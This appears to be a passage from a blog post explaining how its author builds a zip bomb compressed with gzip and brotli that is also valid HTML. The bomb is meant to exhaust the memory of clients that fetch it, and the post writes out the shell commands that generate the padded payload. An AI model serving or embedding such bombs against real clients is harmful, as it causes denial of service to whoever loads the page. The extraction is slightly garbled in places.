Today, I present a zip bomb gzip and brotli that is valid HTML. With a zip bomb, we attempt to exhaust their RAM.1We’re exploiting the asymmetry of the resources needed to serve the zip bomb versus those needed to detect it. So, I set myself the challenge of creating a valid HTML page containing a zip bomb. echo -n '<!DOCTYPE html><html lang=en><head><meta charset=utf-8><title>Projet: Valid HTML bomb</title><meta name=fediverse:creator content=@[email protected]><link rel=canonical href=https://ache.one/bomb.html><!--' echo -n (string repeat --count 258 'H' ) >/tmp/H_258 for i in ( seq 507) cat ( yes /tmp/H_258 | head --lines=81925) end cat ( yes /tmp/H_258 | head --lines=81924) echo -n "--><body><p>This is a HTML valid bomb, cf. The interest of having a more varied HTML zip bomb would be to ensure that the HTML parser doesn’s optimize the reading of certain parts.